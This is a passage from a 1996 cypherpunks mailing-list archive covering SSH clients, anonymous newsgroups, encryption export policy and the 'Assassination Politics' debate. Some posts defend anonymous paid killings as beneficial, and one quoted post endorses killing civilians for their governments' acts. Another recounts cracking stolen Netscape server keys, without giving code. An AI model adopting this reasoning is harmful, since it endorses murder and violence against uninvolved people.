Message-ID: <Pine.LNX.3.95.960926194255.870A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Sep 1996, Robert Hettinga wrote:

> I do know that there was an alt.anonymous.messages, or some such. Haven't
> looked at it lately, but I don't remember too much traffic on it...

It is still active.  However, there are many people who do not receive the
alt.* groups and those who do may only receive newsgroups "approved" by
the news admin.  It is much more difficult to restrict distribution of
newsgroups carried by most major news feeds.  Also, some NNTP servers may
expire alt groups faster than the other hierarchies which is very undesirable
for message pools.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMksV/CzIPc7jvyFpAQG8uAgAh0dx5o2/Ge4Myia62vUx63ENAClZG7vl
pqxTDm61o9sR5aBR2uk11DqVqFVEbQQxAWzYpXd5R4OFvFKraM5OQkmJ96QRT5t6
TPaFIOI79CE0gLJ9i9/SO0ibHlsIe2/5m0/E1TpjidEYa1prVP4zSY7GmAksA5BY
+tNPDvYih8eLz9P55Uwf2IorDEYAth/HMR/GcRIIrISiAGTuP67v5Mz8rSaC5CWJ
XwUYqOsBatr5sLtWTl6kDuARa0dBA7giQ018N5oPS/nqJ3Ambn3MO47ff7p4jzFS
RDglfGlewF/9S7kJ5R6QXTWzhxluiP+VxO6zoENpnpMV1u7ZHpFkvQ==
=KYcM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 12:14:12 +0800
To: guthery@snailbox.com (Scott Guthery)
Subject: Re: Tamper-Resistant Software from INTEL
In-Reply-To: <199609242330.SAA16789@oak.zilker.net>
Message-ID: <199609270057.TAA00414@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Guthery
> Has anybody heard of tamper-resistant software in general or a method
> for tamper-resistant software from Intel in particular?

     What do you mean by "tamper resistant"?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 27 Sep 1996 11:01:06 +0800
To: cypherpunks@toad.com
Subject: NIST conference
Message-ID: <Pine.OSF.3.91.960926195817.6923A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain



Following is an announcement about a NIST conference on leveraging the 
distributed nature of the Internet to accomplish tasks that might be 
otherwise not feasible.  The abstract notes that this type of activity 
has 'important economic, social, and political consequences'.

This may already be old news, I was off the list for the past few days.

Date: Thu, 26 Sep 1996 15:18:08 -0400
From: Liz Lennon <elizabeth.lennon@NIST.GOV>
Subject: Cyber Conference Announcement
To: csl-bulletin@NIST.GOV

>Return-Path: <moline@sst.ncsl.nist.gov>
>Date: Thu, 26 Sep 1996 15:00:46 -0400 (EDT)
>From: Judi Moline <moline@sst.ncsl.nist.gov>
>Subject: Cyber Conference Announcement
>To: elizabeth.lennon@NIST.GOV
>Cc: moline@sst.ncsl.nist.gov
>
>
>Event:		Conference on Leveraging Cyberspace
>
>Date:		October 8-9, 1996
>
>Purpose:	People with shared interests are using the Internet to 
>solve problems, accomplish tasks, and create resources that would be well 
>beyond the reach of any one person or organization. The ability to leverage 
>the efforts of large numbers of networked users has important economic, 
>social, and political consequences. This conference is designed to explore 
>this phenomenon from both a technical and social science perspective.  
>Additionally, the closing session of the conference will cap off several 
>weeks of virtual discussions on the conference's web site.
>
>Location:	Xerox Palo Alto Research Center (PARC)
>		Palo Alto, Calif.
>
>Keynote by:	John Seely Brown, Vice President and Chief Scientist, 
>			Xerox
>
>Program:	Web:  http://nii.nist.gov/cyber/cyber_conf.html
>
>Registration:	$200
>
>Sponsors:	White House National Economic Council
>		Commerce's National Institute of Standards and 
>			Technology
>		Xerox Palo Alto Research Center
>
>Technical contact:	Judi Moline, NIST
>			(301) 975-4601
>			email: jmoline@nist.gov
>
>Information:	Web: http://nii.nist.gov/cyber/cyber_conf.html
>
>To register:	Print registration form from web site and return with 
>			 payment to:
>		Office of the Comptroller
>		NIST
>		A807 Administration Building
>		Gaithersburg, Md. 20899-0001  USA
>
>		Or fax to:
>		Lori Phillips, NIST
>		fax: (301) 948-2067
>
>                Or:
>		Lori.Phillips@nist.gov
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Fri, 27 Sep 1996 12:23:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <rogerhgokyd75.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Black Unicorn <unicorn@schloss.li> writes:

  > Does anyone know if there are MS-Dos or Mac versions of the ssh
  > client?  How much is ssh used?

There is certainly a Mac version, as well as ones for OS/2 and
probably every Unix platform.  There's also a Windows client.  (We use
SSH on OS/2 and Linux, but haven't yet had to try the Windows client.)

The SSH home page is <http://dtk60.pspt.fi/gruppa6/ssh.htm>.

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 12:46:30 +0800
To: dthorn@gte.net (Dale Thorn)
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <3248DE04.5363@gte.net>
Message-ID: <199609270111.UAA00449@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Thorn wrote:
> Maybe, instead of having to face the (alleged) horror of AP, you could 
> join with other like-minded citizens and stop these atrocities from the 
> top down, if you have the nerve to go toe-to-toe with "the real 
> killers", government-style.
> 

     Remember that comment about his cousin? He is one of the "REAL 
KILLERS".

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 27 Sep 1996 12:45:29 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <Pine.LNX.3.95.960926200202.870C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Sep 1996, Black Unicorn wrote:

> Does anyone know if there are MS-Dos or Mac versions of the ssh client?

There isn't a Mac version yet, but there is a beta version for Windows.
Information is available at http://www.ssh.fi.

> How much is ssh used?

It seems to be pretty widespread.  A lot of security conscious ISP's run
sshd and I think there will be an RFC on ssh eventually.

> Looks like a nice little implementation.
> 
> Comments anyone?

It's really a very good program.  The code is huge, so it is somewhat difficult
to really be certain that there aren't any holes somewhere in the program.
There also isn't much key management which makes MITM attacks easier.  But that
would make it even more complex.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkscHyzIPc7jvyFpAQE3iAf8D80eJCWEa2V5JInK6Lv83Od6PkF/BONp
iTzjUZVXW8Qj01aYaMbyLV+StmqHYheBgMX0IKuGM4jrTSQyNTKY9nH83EaVY73/
jGHqeRdBRWNqyPHifWyDSmma7PH7CqYms2FRW+4OKJ7FgDIFmQ1/CV2dtbmrEikB
61+iP0RXvOevWCWmwXQTXOaNbzAD/yo9KGQN1R0U4Aoma9+eS7tEsJSDSWXM63/r
qazQYJvLTVTdwarBCRtPrR0fiIRZcBPZSOvx6pVTAi7XaXcP6xO1F2yyOhxYX8a8
VOVM3As2lOE+C27adizKtsuM+ZQRzko3ZBC72v4SV82l8WCxAHefVg==
=JQlW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Sep 1996 13:32:54 +0800
To: Declan McCullagh <jf_avon@citenet.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <199609270322.UAA14111@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:51 PM 9/26/96 -0700, Declan McCullagh wrote:
>Anonymity and nonescrowed crypto are the linchpins of AP and its more 
>general case, Maysian crypto anarchy. The withering of the nation-state. 
>Whatever you want to call it.
>To prevent it, governments will ban both. A criminal law, passed in the
>wake of say a bombing this fall in Washington, DC, banning nonescrowed
>crypto. (Freeh will assert he has evidence the terrorists used PGPhone.)
>And another law banning online anonymity. 
>What then, Mr. Bell?

While we should continue resist such developments, I (like many others) tend 
to believe that the government is going to have a great deal of difficulty 
implementing such restrictions, for reasons which have been discussed here 
ad nauseum.  I happen to believe that the really crucial reason Clipper was 
proposed is so that it would exclude non-escrowed encryption using market 
forces, because they understood that banning encryption or non-escrowed 
encryption would be essentially impossible.

Remember the VHS/Beta VCR wars?  With a fairly equal market in about 1978, 
Beta died 10 years later because the market couldn't support two 
incompatible standards.  It wasn't that one was dramatically better than the 
other, it was simply that having two standards forced the market to 
duplicate stocks, for the machines as well as tapes, particularly 
pre-recorded tapes.  Notice, however, that VCR's are relatively "isolated":  
It doesn't really matter if you have one format and your neighbor has 
another, unless you want to swap tapes.  But crypto telephones inherently 
require (in the long term) full intercompability.  If you didn't have that, 
there'd be half a world of people you couldn't call!

(This kind of situation is remeniscent of a recollection my mother has of a 
small town she grew up in, in which there were two competing telephone 
companies serving the same area, but customers of company "A" couldn't call 
company "B."  The most popular girl in town was the daughter of a doctor, 
who as a consequence of his profession had telephones from both companies.  
That girl was constantly being called to relay information between people on 
opposite telephone companies!)

The government understood this, and realized that the best way to derail the 
advent of a good crypto telephone standard was to produce one of their own, 
which they figured would pre-empt and kill off any competing system.  It 
turns out that an essential element to this killing-off process  is to 
ensure that the telephones aren't compatible, so I was a bit surprised to 
have to wait a long time to hear that one of the requirements for 
Clipper-phone approval is that they NOT co-operate with non-escrowed 
telephones.  (I was surprised to have to WAIT to hear this, NOT that they 
said it eventually...)

I think they realize that Clipper was their last opportunity to implement a 
de-facto market ban on good encryption, but it isn't working.  

As for a ban on anonymity I don't think that'll fly either.  There are too 
many interactions we do today (off the 'net as well as on) which are already 
anonymous, even if we don't normally think of it that way.  Visit a theater, 
pay cash, and nobody records your name, for instance.   Buy groceries, pay 
cash.  Throw coins in toll booth.  Put coins in Coke machine, ride on bus, 
etc.   It would be very hard to prohibit non-anonymous interactions on the 
net, with so many opportunities for unrestricted anonymity.  There's even less 
reason to ID non-economic transactions too.  Since most interactions on the 'net 
are not a financial transaction, there is even less reason to identify the people 
involved.

So at the risk of being overly optimistic, I think the government isn't 
going to be able to pull off the kind of anti-crypto/anti-anonymity coup you 
describe.   But nevertheless, I think that if they "progress" towards that 
goal against the odds, that could easily be an excellent justification for 
actions which you know they'll describe as "terrorism."



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Fri, 27 Sep 1996 11:49:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <rogerg244yc91.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


Rats, just a clarification:

>>>>> "I" == Roger Williams <roger@coelacanth.com> blurted out:

  > There is certainly a Mac version...

Umm, Machten, that is.  I don't think that the straight Mac version
has been released for beta yet.

  > The SSH home page is <http://dtk60.pspt.fi/gruppa6/ssh.htm>.

Or at http://www.cs.hut.fi/ssh/, if you want it in *English*...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 13:14:22 +0800
To: jf_avon@citenet.net (Jean-Francois Avon)
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609251433.AB02026@cti02.citenet.net>
Message-ID: <199609270146.UAA00509@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text



> On 25 Sep 96 at 5:59, Brian Davis wrote:
> > I disagree that that will be the response, but you should be willing
> > to allow one group of people to fight fire with fire.
> But generally, it has been found a much better solution to fight fire
> with water, and this is why I am not convinced of the ideological 
> effectiveness of AP, although I don't doubt it's operationnal 
> effectiveness at all.
 
     Having been a firefighter for about 4 years, I can say that for 
small fires water works quite a bit better. For larger fires (over a
hundred acres or so) setting a backfire, or burning out the fuel in the
direction the fire is probably going to go is a hell of a lot easier than
hauling millons and millions of gallons or blood^h^h^h^h^h water.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 13:11:04 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: AP
In-Reply-To: <D81TuD1w165w@bwalk.dm.com>
Message-ID: <199609270203.VAA00536@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. KOTM wrote:
> Derek Bell <dbell@maths.tcd.ie> writes:
> > In message <si4RuD1w165w@bwalk.dm.com>, "Dr.Dimitri Vulis KOTM" writes:
> > >Yes, I do.
> > 	I'm not sure what you mean here. Is it:
> > 1. You hold people respobsible for what they did, not what their government
> > did. (Assuming said people didn't take part in what the government did.)
> > 2. You agree that the IRA could justify killing any British citizen, even if
> > said citizen supported the IRA or agreed with its aims.
> > 3. Something else. (Please specify.)
> (Redirected to the list.)
> Any British citizen, irrespective of s/he thinks about the IRA, has
> benefited economically from the 800 years of pillaging and genocide
> in Ireland.  I see no problem if they pay with their lives for
> these crimes. Likewise I see no problem if U.S. civilians pay with
> their lives for their government's crimes in Iraq, even if they
> happen to disapprove of these crimes.

     Does this mean that you are willing to pay for American Crimes, since
you are obviously enjoying the results? Or that you are willing to pay for
Russian and Soviet crimes? 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 27 Sep 1996 16:57:57 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Tamper-Resistant Software from INTEL
Message-ID: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:57 PM 9/26/96 -0500, snow wrote:
>Mr. Guthery
>> Has anybody heard of tamper-resistant software in general or a method
>> for tamper-resistant software from Intel in particular?
>
>     What do you mean by "tamper resistant"?

It means that if you do *ANYTHING* to try and adjust, modify, and/or
configure the software, it no longer functions.  Sadly, Microsoft has beat
them to the punch on this technology.

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Sep 1996 15:01:53 +0800
To: snow <stewarts@ix.netcom.com
Subject: Re: AP Protocol Failures [NOISE]
Message-ID: <199609270426.VAA18243@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 9/26/96 -0500, snow wrote:
>> >> 	Troops are in Northern Ireland for a very simple and depressing
>> >> reason. People like Jim want to impose their will on others by force.
>> But AP is great - adding more violence to Ireland is just the thing
>> they need........
> 
>     It wouldn't ADD more violence. 

I had intended to respond to Bill Stewart's comment before this.  I was 
surprised that he would suggest that AP would (necessarily?) cause "more 
violence."  To me, it's obvious that it will cause _different_ violence, and 
I strongly suspect it'll actually reduce the total violence level, and 
certainly will do so in the long term.  But far more than reducing violence, 
it'll reduce coercion that doesn't rise to the level of violence as well.  
When people AREN'T put in jail or prison for a victimless crime, I consider 
that a drastic reduction in coercion, and that's progress.  Put fewer people 
in jail, and you anger fewer people, and you rob fewer people by taxation to 
pay for that jail, etc.


>> One of the strong negatives of AP is that it leads to reverse AP -
>> if you don't know _which_ Hatfield killed the latest McCoy, 
>> you might as well just shoot one or two Hatfield Boys at random.  
>> If you kill off GrandDaddy Hatfield, there's nobody to say 
>> "OK, let's stop shooting each other"; instead there's a bunch of 
>> angry grandkids, and uncles, _all_ of whom have the
>> authority to say "Let's go kill the McCoy bastards who did this!"
>> The protocols may work when there's one hierarchical target -
>> they don't work with two.  Hammurabi's law about "An eye for an eye
>> and a tooth for a tooth" was a _limitation_ on the amount of vengeance
>> you were allowed to take, not a minimum required vengeance.
>
>     Putting AP into place doesn't make murder legal. You could still 
>be arrested, tried (depending on the jurisdiction) and punished for it. 

Not only that, you could use AP to kill somebody who killed SOMEBODY ELSE 
with AP!  (which is, to me, a rather obvious fact, but one that escapes an 
unusually large number of people.  'course, you'd have to figure out who did 
it... a non-trivial task under the circumstances.)




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Sep 1996 14:49:06 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609270426.VAA18253@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 9/25/96 -0700, Dale Thorn wrote:
>jim bell wrote:
>> That's about it.  I long ago noticed the similarity between AP and the
>> fictional Gort.
>> Problem is, Gort would have to be programmed. How would you write such 
>> a program?  Governments would want their hand in it.  They'd insist on
>> "government exceptions" to rules, like:   "All violence is forbiddden!
>> (except for violence by duly authorized government employees!)"
>> Not very practical.
>
>Indeed it may not be practical to try such a program on current 
>computers.  I've had thoughts for some time about an analogy where each 
>person in a civilization represents a cell in a single brain, and so on, 
>so perhaps AP is merely a portion of the program for this "brain".  As 
>to what happens when you try to concentrate a disproportionate amount of 
>the programming task into a few hands, that appears to be the situation 
>we have now.

Exactly correct.  The current system is intended to present the illusion 
that it is the product of the voters, where it is really defined by the 
political establishment.

Bill Stewart pointed out (correctly) that what I'm proposing is "mechanism 
without a built-in policy."  While this may appear to be a bit reckless, the 
reason I'm confident it will work is that the status quo has a 
_throughly_corrupt_ policy, a policy which is actively hostile to the 
interests and rights of the average citizen.  Replacing that system with one 
that is merely neutral is a great improvement, particularly if there is no 
way for that policy to be hijacked by a tiny minority of the public.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Thu, 26 Sep 1996 20:28:24 +0800
To: cypherpunks@toad.com
Subject: How to break Netscape's server key encryption - Followup
Message-ID: <84373168812186@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


There has been a successful hostile attack on a Netscape server key using the
code I posted yesterday.  I was contacted earlier today by someone who told me
he had in the past obtained Netscape server keys and PGP private keys from
Windows NT machines running Microsofts insecure FTP server which allows access
to the entire drive (he found some of the PGP keys using archie searches -
ouch!).  He lives somewhere with nasty anti-hacking laws and definitely doesn't
want his identity known, but after some pleading said I could reveal the
following:
 
  - He used the cracklib dictionary to get the password
  - The password was found "very quickly"
  - The password was a female name
  - He deleted the server key after he'd found the password
  - He did it merely out of idle curiosity and has no intention of misusing the
    information.
  - He definitely doesn't want to be contacted
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 27 Sep 1996 13:50:11 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.34 - House Committee Holds Hearing on Crypto Bill
Message-ID: <v02140b0dae70e4a5464b@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 34
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 34                    September 26, 1996

 CONTENTS: (1) House Judiciary Committee Holds Hearing on Encryption Bill;
               NSA, DOJ Oppose Efforts to Promote Privacy Online
           (2) How to Subscribe/Unsubscribe to the Policy Post list
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) HOUSE JUDICIARY COMMITTEE HOLDS HEARING ON ENCRYPTION LEGISLATION;
    NSA, DOJ OPPOSE CONGRESSIONAL EFFORTS TO PROMOTE PRIVACY ONLINE

At a hearing before the House Judiciary Committee on Wednesday September
25, Deputy Attorney General Jamie Gorelick laid to rest any lingering
suspicion that the Administration would agree to change current export
controls on strong non-escrowed encryption. Equally troubling to Internet
users, Administration witnesses confirmed that the Government is seeking to
compel domestic Internet users towards a "voluntary" key-escrow encryption
system.

The hearing was called to consider the "Security and Freedom through
Encryption (SAFE) Act of 1996," (H.R. 3011) sponsored by Representatives
Bob Goodlatte (R-VA), Anna Eshoo (D-CA), and a bi-partisan group of more
than 43 other Representatives. The bill is designed to encourage the
widespread availability of strong, easy to use encryption technology by
relaxing current encryption export controls.

The hearing -- the first before the House in nearly 3 years -- marked the
first time the House Judiciary Committee has formally considered the
encryption issue, and marks an important step along the path towards
passage of real encryption policy reforms.

Witnesses testifying before the Committee Wednesday:

* Rep. Bob Goodlatte (R-VA), chief Sponsor of the HR 3011
* Jamie Gorelick, Deputy Attorney General
* William Crowell, Deputy Director, National Security Agency
* William Reinsch, Under Secretary of Commerce, Export Administration
* Melinda Brown, VP and General Counsel, Lotus Development Corp.
* Roberta Katz, VP and General Counsel, Netscape Communications Corp.
* Patricia Rippley, Managing Director, Bear Stearns & Company
* Dr. Charles Deneka, Senior VP and CTO, Corning, Inc (on behalf of the
  National Association of Manufacturers).

REPORTS OF ADMINISTRATION COMPROMISE PROVE PREMATURE

Although some press reports had suggested that the Administration was
poised to announce a new compromise encryption policy in testimony before
the Committee, these reports proved to be premature.

In response to rumors that the administration would relax export controls
on 56 bit DES encryption (encryption exports are currently limited to 40
bit keys) Gorelick stated that the Administration does not support the
unrestricted export of 56 bit DES.

However, Gorelick did confirm that the Administration plans to propose
legislation soon, and suggested such a proposal would specify the process
for law enforcement to access encryption keys held by third-parties.  The
proposal would include new civil penalties for the unauthorized disclosure
of keys.

Additionally, credible sources have told CDT that the Administration's new
proposal will transfer jurisdiction for encryption exports from the State
Department to the Commerce Department, and that domestic law enforcement
will have a role in evaluating export applications.  It is also likely that
the Administration will again offer to raise the export limit from 40 to 64
bit key-lengths with law enforcement access.

ADMINISTRATION REITERATES PLANS TO COMPEL USE OF KEY-ESCROW DOMESTICALLY

Both Gorelick and NSA Deputy Director William Crowell stressed that the
Administration is not seeking to mandate the domestic use of key-escrow
encryption. However, both admitted that they would like to see the
widespread adoption of key-escrow systems and have initiated a broad effort
to encourage industry to develop such systems.

In her prepared statement, Gorelick acknowledged that criminals will at
times use non-escrowed encryption to communicate with themselves, but,

 "we believe that if strong key recovery encryption products that will
  not interoperate -- at least in the long term -- with non-key recovery
  products are made available overseas and domestically and become part
  of a global KMI (Key Management Infrastructure), such products will
  become the worldwide standard.  Under those circumstances, even
  criminals will be compelled to use key recovery products, because even
  criminals need to communicate with legitimate organizations like
  banks, both nationally and internationally."

The administration continues to insist that their policy is "voluntary",
despite the fact that their policy is clearly designed to compel the use of
key-escrow domestically through continued controls on encryption exports
and negotiations with foreign governments through the OECD.  This apparent
double-talk from the Administration cannot be the basis for sound
encryption policy reform.

CONGRESS, INDUSTRY REMAIN SKEPTICAL OF ADMINISTRATION'S POSITION, STAGE IS
SET FOR REAL REFORM NEXT YEAR

Led by Representatives Bob Goodlatte (R-VA) and Zoe Lofgren (D-CA), members
of the Judiciary Committee expressed a great deal of skepticism about the
Administration's proposal.

Rep. Goodlatte (a chief sponsor of the SAFE bill) testified that in his
view, "the chief roadblock to electronic commerce on the Internet is
government regulation of encryption."  Goodlatte added, "The arguments that
the FBI, CIA, and NSA have given me to justify the need for a massive
'key-escrow' or as it's now called 'key-recovery' plan just don't ring true
in 1996."

Representative Zoe Lofgren (D-CA), expressed concern that current US
encryption policy is endangering the future of the US high-technology
industry.  Lofgren was also highly critical of the Administrations efforts
to push for a global key-escrow standards through the OECD. Lofgren said:

 "The Deputy Attorney General also argues that the United States,
  combined with its allies, can control the world encryption market and
  can coordinate the implementation of an international 'key-escrow'
  regime.  Notwithstanding the absence of any demonstrable progress
  towards such an agreement, the aspirations for a comprehensive global
  key escrow scheme ignore the undeniable power of market demand for
  cryptographic products that do not incorporate any form of escrow. The
  customers that purchase encryption products DO NOT WANT products with
  escrowed keys, and if use suppliers are forbidden to supply these
  products, then someone undoubtedly will.  Whatever hopes we may have
  for an international system of key escrow, we will never achieve 100
  percent participation, and those who do not participate will profit
  heavily at our expense." (emphasis in original)


Several other members of the Committee, including Reps. Sonny Bono (R-CA),
John Conyers (D-MI), Robert Scott (D-VA), and John Bryant (D-TX) echoed
these concerns in their questions of the Administration witnesses.  The
fact that Committee members from both parties expressed deep skepticism of
the Administration's proposal is an extremely encouraging preview of the
debate when Congress resumes in January.

Finally, witnesses testifying on behalf of the software industry, the
securities industry and users of encryption technology all expressed
support for the SAFE bill, and argued that current policy threatens the
competitiveness of US businesses and Internet users.

NEXT STEPS

Time is running out in a busy election year Congressional calendar, and
chances of passage of encryption reform legislation in either the House or
Senate before the end of the current term are slim. However, the stage is
clearly set for an all out battle when Congress returns in January, and
support for encryption policy is clearly growing in Congress.

Forty-five Republican and Democratic members of the House have signed on
as co-sponsors of the Security and Freedom through Encryption Act (SAFE).
The Burns/Leahy "Promotion of Commerce Online in the Digital Era (ProCODE)
Act also enjoys broad bi-partisan support in the Senate.  Meanwhile, the
Administration continues to offer more of the same -- continued reliance on
export controls while pushing for a global key-escrow standard.

The stage is set, but the battle over U.S. encryption policy reform is only
just beginning.  CDT will continue to work to educate policy makers and the
public on the importance of encryption policy reform. Over the next several
months, stay tuned for more information on what you can do to help protect
privacy and security on the Internet.

-----------------------------------------------------------------------

(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.34                                            9/26/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Fri, 27 Sep 1996 16:58:25 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <Pine.LNX.3.95.960925223111.314A-100000@gak>
Message-ID: <199609270522.WAA14373@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M." <markm@voicenet.com> writes:

> In an effort to get anonymity and message pools more widespread, I think it
> would be a good idea to establish a newsgroup for anonymous message pools that
> would get the same distribution as any other newsgroup in the "big 8".  The
> "misc" hierarchy is probably the best place for such a newsgroup since it
> already carries groups like "misc.misc" and "misc.test".  Does anyone have any
> suggestions or objections?

This sounds like a good idea.  I would certainly vote for such a news
group.  Should the name be misc.anonymous or misc.anonymous.messages?
Are alt.anonymous and alt.anonymous.messages basically to different
newsgroups for exactly the same purpose, or is there some difference
between them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Fri, 27 Sep 1996 13:34:15 +0800
